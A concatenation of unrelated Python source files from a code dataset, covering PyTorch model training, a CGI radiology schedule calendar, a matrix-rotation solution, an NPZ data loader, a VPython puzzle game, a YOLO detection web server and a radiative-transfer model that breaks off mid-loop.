labels.cuda(self.device)\n                preds,cls_embedding = self.model(input_ids, attention_masks,text_lengths)\n\n                if self.add_graph:\n                    input_model = self.model.module if (len(self.config.config['device_id']) > 1) else self.model\n                    self.writer.writer.add_graph(input_model,\n                                                 [input_ids, attention_masks, text_lengths])\n                    self.add_graph = False\n                loss = self.criterion[0](preds, labels)\n                self.writer.set_step((epoch - 1) * len(self.valid_data_loader) + batch_idx, 'valid')\n                self.valid_metrics.update('loss', loss.item())\n\n                for met in self.metric_ftns:\n                    self.valid_metrics.update(met.__name__, met(preds, labels))\n\n        log = self.valid_metrics.result()\n        # add histogram of model parameters to the tensorboard\n        for name, p in self.model.named_parameters():\n            self.writer.add_histogram(name, p, bins='auto')\n        return log\n\n    def _inference(self):\n        \"\"\"\n        Inference after training an epoch\n\n        :param epoch: Integer, current training epoch.\n        :return: A log that contains information about validation\n        \"\"\"\n        checkpoint = torch.load(self.best_path)\n        self.logger.info(\"load 
best mode {} ...\".format(self.best_path))\n self.model.load_state_dict(checkpoint['state_dict'])\n self.model.eval()\n\n ps = []\n ls = []\n with torch.no_grad():\n for batch_idx, data in enumerate(self.valid_data_loader):\n ids,texts, input_ids, attention_masks, text_lengths, labels = data\n if 'cuda' == self.device.type:\n input_ids = input_ids.cuda(self.device)\n attention_masks = attention_masks.cuda(self.device)\n labels = labels.cuda(self.device)\n preds,cls_embedding = self.model(input_ids, attention_masks,text_lengths)\n ps.append(preds)\n ls.append(labels)\n\n ps = torch.cat(ps,dim=0)\n ls = torch.cat(ls,dim=0)\n acc = module_mertric.binary_accuracy(ps,ls)\n self.logger.info('\\toverall acc :{}'.format(acc))\n\n result_file = self.test_data_loader.dataset.data_dir.parent / 'result' /'{}-{}-{}-{}-{}.jsonl'.format(\n self.config.config['experiment_name'],\n self.test_data_loader.dataset.transformer_model,\n self.config.config['k_fold'],self.i_fold,acc)\n\n if not result_file.parent.exists():\n result_file.parent.mkdir()\n\n result_writer = result_file.open('w')\n\n with torch.no_grad():\n for batch_idx, data in enumerate(self.test_data_loader):\n ids,texts, input_ids, attention_masks, text_lengths, labels = data\n if 'cuda' == self.device.type:\n input_ids = input_ids.cuda(self.device)\n attention_masks = attention_masks.cuda(self.device)\n preds,cls_embedding = self.model(input_ids, attention_masks,text_lengths)\n preds =torch.round(torch.sigmoid(preds)).cpu().detach().numpy()\n for pred, item_id, text in zip(preds, ids, texts):\n result_writer.write(json.dumps({\n \"id\": item_id,\n \"text\": text,\n \"labels\": int(pred)\n }, ensure_ascii=False) + '\\n')\n\n result_writer.close()\n self.logger.info('result saving to {}'.format(result_file))\n\n def _progress(self, batch_idx):\n base = '[{}/{} ({:.0f}%)]'\n if hasattr(self.data_loader, 'n_samples'):\n current = batch_idx * self.data_loader.batch_size\n total = self.data_loader.n_samples\n else:\n current = batch_idx\n total = self.len_epoch\n return base.format(current, total, 100.0 * current / total)\n","sub_path":"trainer/trainer_sigmoid.py","file_name":"trainer_sigmoid.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"190488599","text":"#!/usr/bin/env python2.7\n# (c) Copyright 2013 Greg Rogalski. All Rights Reserved. 
\n# \n# rad.py\n#\n# Displays monthly calendar either by radiologist, or by rotation\n#\n\nimport cgi\nimport schedinc\nfrom utils import radcal\nfrom utils import rotation\nfrom utils.holiday import HolidayList\nfrom utils import radiologist\nfrom utils import schedule\nfrom admin import scratchpad\nfrom utils import isodate\nfrom utils import schedutils\nfrom utils import style\nfrom assignote import SchedNoteList\n\ndef monthly_by_rad(S, radname, start_date=None):\n    \"\"\"Generate monthly calendar for radiologist 'radname'\n    optional: starting on start_date:isodate.Isodate object\"\"\"\n    if start_date:\n        start_year = start_date.y\n        start_month = start_date.m\n    else:\n        t = isodate.today(hours_offset=S.sgb.timezone_offset)\n        start_year = t.y\n        start_month = t.m\n    \n    rcal = radcal.RadCalendar(S)\n    oldest = S.get_maxdate() # Find oldest date on the schedule\n    \n    # loop through all the months from now till end of schedule\n    for (Y,M) in schedutils.month_year_iter(start_month,start_year, oldest.m+1, oldest.y):\n        S.sgb.output( rcal.htmlmonthcss(M,Y, radname, day_callback_byrad,\n            prev_next_link_list=(None, None, None)))\n        S.sgb.output(\"    \")\n\ndef monthly_by_rot(S, # schedule obj, already initialized and loaded with data\n                   rotname,\n                   start_date=None # when to start , defaults to today\n):\n    if start_date == None:\n        start_date = isodate.today(hours_offset=S.sgb.timezone_offset)\n\n    rcal = radcal.RadCalendar(S)\n    oldest = S.get_maxdate() # Find oldest date on the schedule\n    \n    # loop through all the months from now till end of schedule\n    for month in range(start_date.m, oldest.m+1):\n        S.sgb.output( rcal.htmlmonthcss(month,\n                        start_date.y, rotname, day_callback_byrot,\n                        prev_next_link_list=(None, None, None)))\n        S.sgb.output(\"

    \")\n\n\ndef day_callback_byrad(schedobj, thedate, radname, handle=None):\n \"\"\" Returns assignments and a format string for the element\n \"\"\"\n # radidx = radiologist.RadList.get_index_by_radname(radname)\n try:\n asslist = schedobj.get_assignments(str(thedate),radname)\n except schedule.ScheduleError: # ignore if we access schedule that wasn't loaded in\n asslist = []\n\n # pick a color for the cell\n if thedate == isodate.today(hours_offset=schedobj.sgb.timezone_offset):\n cssclass = 'today'\n ### FIXME: do a check for a changed (yellow) day here!\n ### class=changed\n elif thedate < isodate.today(hours_offset=schedobj.sgb.timezone_offset):\n cssclass = 'oldday'\n elif schedobj.is_modified(thedate, radname):\n cssclass = 'changed'\n elif thedate.is_weekend() or HolidayList.is_holiday(thedate):\n cssclass = 'weekend'\n elif len(asslist) > 0:\n cssclass = 'assignedday'\n else:\n cssclass = 'emptyday'\n\n s = []\n if schedobj.snl and schedobj.snl.hasnotes(str(thedate), radname) > 0:\n # FIXME: don't display icon IF note put in by 'admin' - done by me for schedule purposes\n # OK to show the note, just don't have to advertise it\n media_dir = schedobj.sgb.media\n s.append('' % media_dir)\n \n\n for rotname in asslist:\n formatstr = rotation.Rotation.get_rot_format(rotname)\n if formatstr:\n s.append( formatstr )\n else:\n s.append( \"

    %s\" % rotname)\n\n return (cssclass, \"foobar\", \"\\n\".join(s))\n \ndef day_callback_byrot(schedobj, thedate, rotname, handle=None):\n \"\"\" Returns assignments and a format string for the element\n \"\"\"\n rotobj = schedobj.get_rotobj(rotname, thedate)\n asslist = schedobj.get_assigned_rads(str(thedate),rotname)\n\n # List assignments to all SUBclasses as well\n # e.g.; if given MIC, show MIC-CAR, MIC-ELK, MIC-ELK_MAM, etc\n # if given MIC-ELK, also show MIC-ELK-MAM, etc\n # if given WKND, show all weekend calls\n # must work even if class is 'virtual'\n\n if not rotobj:\n # there was nobody assigned on this day, hence rotobj wasn't created\n # but we still need to find the subclasses,\n # so create a new instance just to find subclass list\n rotobj = rotation.make_new_rotation_obj(rotname)\n\n # now look for all rads assigned to subclasses as well.\n subclasses = schedutils.get_all_subclasses(rotobj.__class__)\n if subclasses and len(subclasses) > 0:\n for rot in subclasses:\n asslist.extend(schedobj.get_assigned_rads(thedate, rot.rotname))\n \n # pick a color for the cell\n if thedate == isodate.today(hours_offset=schedobj.sgb.timezone_offset):\n cssclass = 'today'\n ### FIXME: do a check for a changed (yellow) day here!\n ### cssclass='changed'\n elif thedate < isodate.today(hours_offset=schedobj.sgb.timezone_offset):\n cssclass = 'oldday'\n elif thedate.is_weekend() or HolidayList.is_holiday(thedate):\n cssclass = 'weekend'\n elif len(asslist) > 0:\n cssclass = 'assignedday'\n else:\n cssclass = 'emptyday'\n \n s = []\n for radname in asslist:\n s.append( \"

    %s\" % radname)\n\n return (cssclass, \"foobar\", \"\\n\".join(s))\n \nif __name__ == '__main__':\n sgb = schedinc.SchedGlob(None)\n # FIXME move the following line to schedinc: output right after text/html\n # sgb.output(\"\"\"\"\"\")\n rotation.Rotation.read_from_db(sgb.get_dbhandle())\n radiologist.RadList(sgb.get_dbhandle())\n HolidayList.load_holidays(sgb.get_dbhandle())\n\n t = isodate.today(hours_offset=sgb.timezone_offset)\n \n form = cgi.FieldStorage()\n catname = form.getfirst(\"name\",\"\").upper()\n if catname == None:\n raise Exception(\"Must supply name= argument\")\n category = form.getfirst(\"cat\",\"\").upper()\n if category == None:\n raise Exception(\"Must supply cat= argument\")\n schedtype = form.getfirst(\"type\",\"\").upper()\n if schedtype == \"\" or schedtype == None:\n schedtype = \"SCHEDULE\"\n\n if schedtype == \"SCHEDULE\" or schedtype == \"LINT\":\n S = schedule.Schedule(sgb)\n elif schedtype == \"SCRATCHPAD\":\n S = scratchpad.ScratchPad(sgb)\n else:\n raise Exception(\"Unknown schedule type: type=\")\n \n rcal = radcal.RadCalendar(S)\n\n start_date = form.getfirst(\"start\")\n if start_date:\n new_date = isodate.Isodate(str(start_date))\n start_date = isodate.Isodate(\"%s-%s-01\" % (new_date.y, new_date.m)) #include full preceding month\n else:\n start_date=isodate.Isodate(\"%s-%s-01\" % (t.y, t.m))\n\n sgb.output( style.header(\"Schedule for %s\" % catname.capitalize(),\n media_dir=sgb.get_media_URL()))\n \n sgb.output( style.menu(sgb))\n sgb.output( \"

Schedule for %s\" % catname.capitalize())\n    \n    sgb.output( \"\\n\")\n\n    S.import_from_db(start_date=start_date)\n    S.snl = SchedNoteList(sgb.get_dbhandle())\n    \n    if category == 'RAD':\n        monthly_by_rad(S, catname, start_date)\n    elif category == 'ROT':\n        monthly_by_rot(S,catname, start_date)\n    else:\n        raise Exception(\"Can't understand request cat=%s\" % category)\n    \n    sgb.output( \"
    \\n\")\n \n sgb.db_logout()\n\n","sub_path":"rad.py","file_name":"rad.py","file_ext":"py","file_size_in_byte":7748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"570625946","text":"from typing import List\n\n# https://leetcode.com/problems/rotate-image/discuss/18884/Seven-Short-Solutions-(1-to-7-lines)\nclass Solution:\n def rotate(self, A: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n A.reverse()\n for i in range(len(A)):\n for j in range(i):\n A[i][j], A[j][i] = A[j][i], A[i][j]\n\n\nif __name__ == \"__main__\":\n matrix = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n ]\n print(matrix)\n sol = Solution()\n sol.rotate(matrix)\n print(matrix)","sub_path":"problems/48_rotate_image.py","file_name":"48_rotate_image.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"243854211","text":"import requests\nimport time\n\nurl = 'https://landgov.donorplatform.org/ajax/map/get-programs-details'\nresp = requests.get(url=url)\ndata = resp.json() # Check the JSON Response Content documentation below\n\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\nfilename_output = timestr+\"-get-programs-details.txt\"\n\nwith open(filename_output, 'w') as file:\n file.write(data[\"html\"].encode('utf8'))\n\nwith open(\"programs-details.txt\", 'w') as file:\n file.write(data[\"html\"].encode('utf8'))","sub_path":"landprojects/projects_map_of_donors/0-get-programs-details.py","file_name":"0-get-programs-details.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"111932519","text":"from pathlib import Path\nfrom typing import Optional, Union\n\nimport numpy as np\n\nfrom activity_viewer.base import type_check\nfrom activity_viewer.constants import AP_MAX, DV_MAX, LR_MAX\n\nPathType = Union[str, Path]\n\n\nclass NpzLoader:\n \"\"\"Class for loading data files.\"\"\"\n\n def __init__(self):\n self._data = None\n self._file_path = None\n self._keys = None\n\n def _validate_data(self):\n \"\"\"Ensure data is valid.\"\"\"\n # probe insertion\n try:\n probe_insertion = self._data[\"probe_insertion\"]\n except KeyError:\n raise KeyError(\"Data missing 'probe_insertion' field.\")\n\n # 1 value\n if probe_insertion.size != 1:\n raise ValueError(\"Too many values for probe_insertion.\")\n\n # a string\n probe_insertion = probe_insertion.reshape(-1)[0]\n if not isinstance(probe_insertion, str):\n raise TypeError(f\"Expecting a string for probe_insertion, got {type(probe_insertion).__name__}\")\n\n # unit ids\n try:\n unit_id = self._data[\"unit_id\"]\n except KeyError:\n raise KeyError(\"Data missing 'unit_id' field.\")\n\n # integer ids\n if not np.issubdtype(unit_id.dtype, np.integer):\n raise TypeError(f\"Expecting integer unit ids, got {unit_id.dtype}.\")\n\n unit_id = unit_id.reshape(-1) # flatten the array\n nunits = unit_id.size\n\n # all unique\n nunique = np.unique(unit_id).size\n if nunique != nunits:\n raise ValueError(f\"Expecting {nunits} unique unit ids, got {nunique}.\")\n\n # CCF coordinates\n try:\n ccf_coord = self._data[\"ccf_coord\"]\n except KeyError:\n raise KeyError(\"Data missing 'ccf_coord' field.\")\n\n # numeric values\n if not np.issubdtype(ccf_coord.dtype, np.integer) and not np.issubdtype(ccf_coord.dtype, np.floating):\n raise TypeError(f\"Expecting numeric CCF coordinates, got {ccf_coord.dtype}.\")\n\n 
# 3 coords for each unit\n if ccf_coord.shape != (nunits, 3):\n raise ValueError(f\"Expecting a {nunits} x 3 array for ccf_coord, got {ccf_coord.shape}\")\n\n # x values in range\n if ((ccf_coord[:, 0] < 0) | (ccf_coord[:, 0] > AP_MAX)).any():\n raise ValueError(f\"Some coordinates in x column were outside the allowed range of [0, {AP_MAX}].\")\n\n # y values in range\n if ((ccf_coord[:, 1] < 0) | (ccf_coord[:, 1] > DV_MAX)).any():\n raise ValueError(f\"Some coordinates in y column were outside the allowed range of [0, {DV_MAX}].\")\n\n # z values in range\n if ((ccf_coord[:, 2] < 0) | (ccf_coord[:, 2] > LR_MAX)).any():\n raise ValueError(f\"Some coordinates in z column were outside the allowed range of [0, {LR_MAX}].\")\n\n # waveform\n if \"waveform\" in self._data:\n waveform = self._data[\"waveform\"]\n\n # numeric values\n if not np.issubdtype(waveform.dtype, np.integer) and not np.issubdtype(waveform.dtype, np.floating):\n raise TypeError(f\"Expecting numeric waveform values, got {waveform.dtype}.\")\n\n # 3 coords for each unit\n if waveform.ndim != 2 or waveform.shape[0] != nunits:\n raise ValueError(\n f\"Expecting a 2D array for waveform with {nunits} in the first dimension, got {waveform.shape}\")\n\n # timeseries\n if \"timeseries\" in self._data:\n timeseries = self._data[\"timeseries\"]\n\n if not np.issubdtype(timeseries.dtype, np.str_):\n raise TypeError(f\"Expecting an array of strings for timeseries, got {timeseries.dtype}.\")\n\n for t in timeseries:\n tval = self._data.get(t)\n if tval is None:\n raise KeyError(f\"Timeseries {t} specified, but not found.\")\n\n if tval.ndim != 2 or tval.shape[0] != nunits + 1:\n raise ValueError(\n f\"Expecting a 2D array for timeseries {t} with {nunits + 1} in the first dimension, got {tval.shape}\")\n\n # unit statistics\n if \"unit_stats\" in self._data:\n unit_stats = self._data[\"unit_stats\"]\n\n if not np.issubdtype(unit_stats.dtype, np.str_):\n raise TypeError(f\"Expecting an array of strings for unit_stats, got {unit_stats.dtype}.\")\n\n for s in unit_stats:\n sval = self._data.get(s)\n if sval is None:\n raise KeyError(f\"Unit statistic {s} specified, but not found.\")\n\n if sval.size != nunits:\n raise ValueError(\n f\"Expecting a 1D array for unit statistic {s} with {nunits} values, got {sval.shape}\")\n\n def get(self, key: str):\n \"\"\"Get value from data keyed by `key`, or None if `key` is not found.\"\"\"\n if self._data is not None:\n try:\n return self._data.get(key)\n except:\n return None\n\n def load_file(self, file_path: PathType, validate: bool = True):\n \"\"\"Load data from the file living at `file_path`.\n \n Parameters\n ----------\n file_path : str\n Path to file to load.\n validate : bool, optional\n Perform data validation iff true.\n \"\"\"\n type_check(file_path, PathType.__args__)\n self._file_path = file_path\n self._data = np.load(self._file_path)\n self._keys = {k for k in self._data.keys()}\n\n if validate:\n self._validate_data()\n\n @property\n def data(self) -> np.lib.npyio.NpzFile:\n return self._data\n\n @property\n def file_path(self) -> PathType:\n return self._file_path\n\n @file_path.setter\n def file_path(self, val: PathType):\n type_check(val, PathType.__args__)\n self._file_path = Path(val).resolve()\n\n @property\n def keys(self) -> Optional[set]:\n return self._keys\n","sub_path":"activity_viewer/loaders/npz_loader.py","file_name":"npz_loader.py","file_ext":"py","file_size_in_byte":5981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
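The NpzLoader record above validates .npz bundles field by field: exactly one probe_insertion string, unique integer unit_id values, an n-by-3 ccf_coord array bounded by AP_MAX/DV_MAX/LR_MAX, and optional per-unit arrays named in unit_stats. A minimal sketch of writing a bundle that would pass those checks, using only numpy; the bound values here are assumed stand-ins for whatever activity_viewer.constants actually defines:

import numpy as np

# Assumed stand-in values; the real bounds come from activity_viewer.constants.
AP_MAX, DV_MAX, LR_MAX = 13200, 8000, 11400

n_units = 5
rng = np.random.default_rng(0)
np.savez(
    "example_bundle.npz",
    probe_insertion=np.array(["probe00"]),   # exactly one string value
    unit_id=np.arange(n_units),              # unique integer ids
    ccf_coord=np.column_stack([              # n_units x 3, each column in range
        rng.uniform(0, AP_MAX, n_units),
        rng.uniform(0, DV_MAX, n_units),
        rng.uniform(0, LR_MAX, n_units),
    ]),
    unit_stats=np.array(["firing_rate"]),    # names of per-unit 1-D arrays
    firing_rate=rng.random(n_units),
)

with np.load("example_bundle.npz") as bundle:
    print(sorted(bundle.keys()))

Calling NpzLoader().load_file("example_bundle.npz") on such a file should then pass _validate_data without raising.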
+{"seq_id":"194626648","text":"\"\"\"\n############################################################\nGlowfish - A 3D game as variation of tic-tac-toe\n############################################################\n\n:Author: *Carlo E. T. Oliveira*\n:Contact: carlo@nce.ufrj.br\n:Date: 2014/05/07\n:Status: This is a \"work in progress\"\n:Home: `Labase `__\n:Copyright: 2014, `GPL `__.\n\nIn GlowFish you combine the properties of blobs to win.\n\"\"\"\n__version__ = '0.1.0'\nvec = color = None\nL3, L2 = 6, 4\nCS = 120\nPD = 70\nPO = 10\n\n\nclass Blob:\n\n def __init__(self, gui):\n def pc(inb, oub, tin, szi, tou, szo):\n return lambda ps: inb(tin, szi, ps) + oub(tou, szo, ps)\n self.jail = None\n cl = color\n M, N, G, Y, S, L = cl.magenta, cl.blue, cl.green, cl.yellow, 10, 0\n TIN, TOU, SZI = (cl.magenta, cl.blue), (cl.green, cl.yellow), (20, 0)\n INB, OUB, SZO = (self.dice, self.ball), (self.frame, self.ring), (15, 0)\n bpos = [(x*125 - 4*CS, y*125, 3*CS) for x in range(-4, 0) for y in range(-4, 4)]\n bpos += [(x*125 + 5*CS, y*125, 3*CS) for x in range(0, 4) for y in range(-4, 4)]\n self.bpos = bpos\n self.gui = gui\n #gui.scene.bind(\"click\", self.click)\n self.blober = [\n pc(inb, oub, tin, szi, tou, szo)\n for inb in INB for oub in OUB for tin in TIN for szi in SZI for tou in TOU for szo in SZO]\n self.blob = [blob(pos) for pos, blob in zip(bpos, self.blober)]\n\n def dice(self, tint, size, ps):\n size += 20\n return [self.gui.box(pos=ps, size=(CS-PO-size, CS-PO-size, CS-PO-size), color=tint, opacity=1)]\n\n def ball(self, tint, size, ps):\n size -= 5\n return [self.gui.sphere(pos=ps, size=(CS-PO-size, CS-PO-size, CS-PO-size), color=tint, opacity=1)]\n\n def frame(self, tint, size, ps):\n return [\n self.gui.box(pos=ps, size=(CS, PO+size, CS), color=tint, opacity=1),\n self.gui.box(pos=ps, size=(CS, CS, PO+size), color=tint, opacity=1),\n self.gui.box(pos=ps, size=(PO+size, CS, CS), color=tint, opacity=1)]\n\n def ring(self, tint, size, ps):\n RCS = CS + 10\n return [\n self.gui.sphere(pos=ps, size=(RCS, PO+2*size, RCS), color=tint, opacity=1),\n self.gui.sphere(pos=ps, size=(RCS, RCS, PO+2*size), color=tint, opacity=1),\n self.gui.sphere(pos=ps, size=(PO+2*size, RCS, RCS), color=tint, opacity=1)]\n\n def click(self, event):\n obj = self.gui.scene.mouse.pick()\n objp = obj.pos\n pos = (objp.x, objp.y, objp.z)\n #print(\"blob click\", event.type, event.which, pos) # .x, obj.y, obj.z)\n if not pos in self.bpos:\n #print(\"click not in bpos\", self.bpos)\n return\n for blob in self.blob:\n for part in blob:\n part.visible = False\n obind = self.bpos.index(pos)\n for part in self.blob[obind]:\n part.visible = True\n\n self.jail.toggle(self.blob[obind])\n\n def show(self, ablob):\n self.blob[self.blob.index(ablob)] = []\n for blob in self.blob:\n for part in blob:\n part.visible = True\n\n\nclass Jail:\n def __init__(self, gui, blob):\n\n self.gui = gui\n blob.jail = self\n gui.scene.bind(\"click\", self.click)\n side = (-CS, 0, CS)\n side = (-3*CS, -CS, CS, 3*CS)\n self.hole = []\n self.obj = None\n self.cell = [[[(x, y, z) for x in side] for y in side] for z in side]\n self.loci = [(x, y, z) for x in side for y in side for z in side]\n self._click, self._next = blob.click, self.jail_click\n self.show = blob.show\n\n def draw(self):\n gui = self.gui\n #print (self.cell)\n self.hole = [gui.box(pos=cell, size=(CS-PD, CS-PD, CS-PD), color=color.gray(0.2), opacity=1)\n for plane in self.cell for line in plane for cell in line]\n\n #print(color.blue, list(hole.opacity for hole in self.hole))\n\n 
def click(self, event):\n self._click(event)\n\n def toggle(self, obj):\n self.obj = obj\n self._click, self._next = self._next, self._click\n\n def jail_click(self, event):\n obj = self.gui.scene.mouse.pick()\n objp = obj.pos\n pos = (objp.x, objp.y, objp.z)\n #print(event.type, event.which, pos, objp, self.obj) # .x, obj.y, obj.z)\n if not pos in self.loci:\n return\n #self.gui.sphere(pos=objp, size=(CS-PO, CS-PO, CS-PO), color=color.magenta, opacity=1)\n for part in self.obj:\n part.pos = vec(*pos) # objp\n obj.visible = False\n self.loci[self.loci.index(pos)] = None\n self.show(self.obj)\n self.toggle(self.obj)\n\n\ndef main(gui, gvec, gcolor):\n global vec, color\n vec = gvec\n color = gcolor\n print('Fishing %s' % __version__)\n #Aquarium(gui).draw()\n\n Jail(gui, Blob(gui)).draw()\n #Peixe(bry, _cons).animate(0)","sub_path":"src/glowfishing.py","file_name":"glowfishing.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"99256353","text":"import os\nimport sys\nimport argparse\nfrom yolo import YOLO, detect_video\nfrom PIL import Image\nfrom timeit import default_timer as timer\nfrom utils import load_extractor_model, load_features, parse_input, detect_object\nimport test\nimport utils\nimport pandas as pd\nimport numpy as np\nimport random\nimport urllib\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport time\nimport base64\nimport io\nimport traceback\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\ndef init_model():\n # Split images and videos\n img_endings = (\".jpg\", \".jpg\", \".png\", \".jpeg\")\n\n # define YOLO detector\n yolo = YOLO(\n **{\n \"model_path\": \"./trained_weights_final.h5\",\n \"anchors_path\": \"./yolo_anchors.txt\",\n \"classes_path\": \"./data_classes.txt\",\n \"score\": .30,\n \"gpu_num\": 1,\n \"model_image_size\": (416, 416),\n }\n )\n\n # Make a dataframe for the prediction outputs\n out_df = pd.DataFrame(\n columns=[\n \"image\",\n \"image_path\",\n \"xmin\",\n \"ymin\",\n \"xmax\",\n \"ymax\",\n \"label\",\n \"confidence\",\n \"x_size\",\n \"y_size\",\n ]\n )\n\n # labels to draw on images\n class_file = open(\"./data_classes.txt\", \"r\")\n input_labels = [line.rstrip(\"\\n\") for line in class_file.readlines()]\n return img_endings, yolo, out_df, class_file, input_labels\n\ndef process_image(img_endings, yolo, out_df, class_file, input_labels, img_base64=None):\n start = timer()\n text_out = \"\"\n # This is for images\n image_path ='./input.jpg'\n prediction, image = detect_object(\n yolo,\n image_path,\n save_img=True,\n save_img_path=\"./\",\n postfix=\"_output\",\n img_base64=img_base64\n )\n print(prediction)\n y_size, x_size, _ = np.array(image).shape\n for single_prediction in prediction:\n out_df = out_df.append(\n pd.DataFrame(\n [\n [\n os.path.basename(image_path.rstrip(\"\\n\")),\n image_path.rstrip(\"\\n\"),\n ]\n + single_prediction\n + [x_size, y_size]\n ],\n columns=[\n \"image\",\n \"image_path\",\n \"xmin\",\n \"ymin\",\n \"xmax\",\n \"ymax\",\n \"label\",\n \"confidence\",\n \"x_size\",\n \"y_size\",\n ],\n )\n )\n end = timer()\n print(\n \"Processed {} image in {:.1f}sec - {:.1f}FPS\".format(\n 1,\n end - start,\n 1.0 / (end - start),\n )\n )\n return prediction, image\n\nhostName = \"localhost\"\nserverPort = 7777\n\nprint(\"Initializing model\")\nimg_endings, yolo, out_df, class_file, input_labels = init_model()\n\nclass MyServer(BaseHTTPRequestHandler):\n def do_POST(self):\n try:\n print('received post to ' + 
hostName + \":\" + str(serverPort) + \"/\")\n length = int(self.headers['Content-Length'])\n img_base64 = (self.rfile.read(length))\n print('\\trunning inference')\n predictions, new_image = process_image(img_endings, yolo, out_df, class_file, input_labels, img_base64=img_base64)\n print('\\twriting response')\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n self.wfile.write(bytes('{\"predictions\":\"' + str(predictions) + '\", \"data\": \"', 'utf-8'))\n new_image_bytes=io.BytesIO() \n new_image.save(new_image_bytes, format='JPEG')\n new_image_bytes = new_image_bytes.getvalue()\n b64_new_image_bytes = base64.b64encode(new_image_bytes)\n self.wfile.write(b64_new_image_bytes)\n self.wfile.write(bytes('\"}',\"utf-8\"))\n print('\\tsending response')\n except Exception as e:\n traceback.print_exc()\n\nif __name__ == \"__main__\":\n webServer = HTTPServer((hostName, serverPort), MyServer)\n print(\"Server started http://%s:%s\" % (hostName, serverPort))\n\n try:\n webServer.serve_forever()\n except KeyboardInterrupt:\n pass\n\n webServer.server_close()\n print(\"Server stopped.\")\n","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"115076938","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n#\n# use pretty plotting if it can be imported\n#\ntry:\n import seaborn\nexcept:\n pass\n\nsigma=5.67e-8\n\ndef find_tau(tot_trans,num_layers):\n \"\"\"\n # -TD- document using\n \"\"\"\n trans_layer=tot_trans**(1./num_layers)\n tau_layer= -1.*np.log(trans_layer)\n tau_layers=np.ones([num_layers])*tau_layer\n tau_levels=np.cumsum(tau_layers)\n tau_levels=np.concatenate(([0],tau_levels))\n return tau_levels\n\ndef find_heights(press_levels,rho_layers):\n \"\"\"\n -TD- docstring using google style\n \"\"\"\n Rd=287.\n g=9.8\n press_layers=(press_levels[1:] + press_levels[:-1])/2.\n del_press=(press_levels[1:] - press_levels[0:-1])\n rho_layers=press_layers/(Rd*Temp_layers)\n del_z= -1.*del_press/(rho_layers*g)\n level_heights=np.cumsum(del_z)\n level_heights=np.concatenate(([0],level_heights))\n return level_heights\n\ndef fluxes(tau_levels,Temp_layers,T_surf):\n \"\"\"\n -TD- docstring using google style\n \"\"\"\n up_rad=np.empty_like(tau_levels)\n down_rad=np.empty_like(tau_levels)\n sfc_rad=sigma*T_surf**4.\n up_rad[0]=sfc_rad\n tot_levs=len(tau_levels)\n for index in np.arange(1,tot_levs):\n upper_lev=index\n lower_lev=index - 1\n layer_num=index-1\n del_tau=tau_levels[upper_lev] - tau_levels[lower_lev]\n trans=np.exp(-1.666*del_tau)\n emiss=1 - trans\n layer_rad=sigma*Temp_layers[layer_num]**4.*emiss\n up_rad[upper_lev]=trans*up_rad[lower_lev] + layer_rad\n down_rad[tot_levs-1]=0\n for index in np.arange(1,tot_levs):\n upper_lev=tot_levs - index\n lower_lev=tot_levs - index -1\n layer_num=tot_levs - index - 1\n del_tau=tau_levels[upper_lev] - tau_levels[lower_lev]\n trans=np.exp(-1.666*del_tau)\n emiss=1 - trans\n layer_rad=sigma*Temp_layers[layer_num]**4.*emiss\n down_rad[lower_lev]=down_rad[upper_lev]*trans + layer_rad\n return (up_rad,down_rad)\n\ndef heating_rate(net_up,height_levels,rho_layers):\n \"\"\"\n -TD- docstring using google style\n \"\"\"\n cpd=1004.\n dFn_dz= -1.*np.diff(net_up)/np.diff(height_levels)\n dT_dt=dFn_dz/(rho_layers*cpd)\n return dT_dt\n\ndef time_step(heating_rate,Temp_layers,delta_time):\n \"\"\"\n -TD- docstring 
using google style\n \"\"\"\n Temp_layers[:] = Temp_layers[:] + heating_rate*delta_time\n return Temp_layers\n\nif __name__==\"__main__\":\n \n tot_trans=0.2\n num_layers=100\n p_sfc=1000.*1.e2\n p_top=100.*1.e2\n g=9.8\n T_sfc=300.\n Rd=287. #J/kg/K\n num_levels=num_layers+1\n tau_levels=find_tau(tot_trans,num_layers)\n press_levels=np.linspace(p_top,p_sfc,num_levels)\n press_diff=np.diff(press_levels)[0]\n press_levels=press_levels[::-1]\n press_layers=(press_levels[1:] + press_levels[:-1])/2.\n Temp_levels=np.ones([num_levels])*T_sfc\n Temp_layers=(Temp_levels[1:] + Temp_levels[:-1])/2.\n\n S0=241.\n Tc=273.15\n delta_time_hr=30 #time interval in hours\n delta_time_sec=30*3600. #time interval in seconds\n stop_time_hr=600*24. #stop time in hours\n times=np.arange(0,stop_time_hr,delta_time_hr) #times in hours\n tot_loops=len(times)\n num_times=len(times)\n #\n # -TD- comment which variables are defined on levels, and which on layers\n #\n sfc_temp=np.empty([num_times],dtype=np.float64)\n hours=np.empty_like(sfc_temp)\n #\n # -TD- describe what the 2-d arrays are used for\n #\n air_temps=np.empty([num_layers,num_times],dtype=np.float64)\n up_flux_run=np.empty([num_levels,num_times],dtype=np.float64)\n down_flux_run=np.empty_like(up_flux_run)\n height_levels_run=np.empty_like(up_flux_run)\n \n for index in np.arange(0,num_times):\n rho_layers=press_layers/(Rd*Temp_layers)\n height_levels=find_heights(press_levels,rho_layers)\n 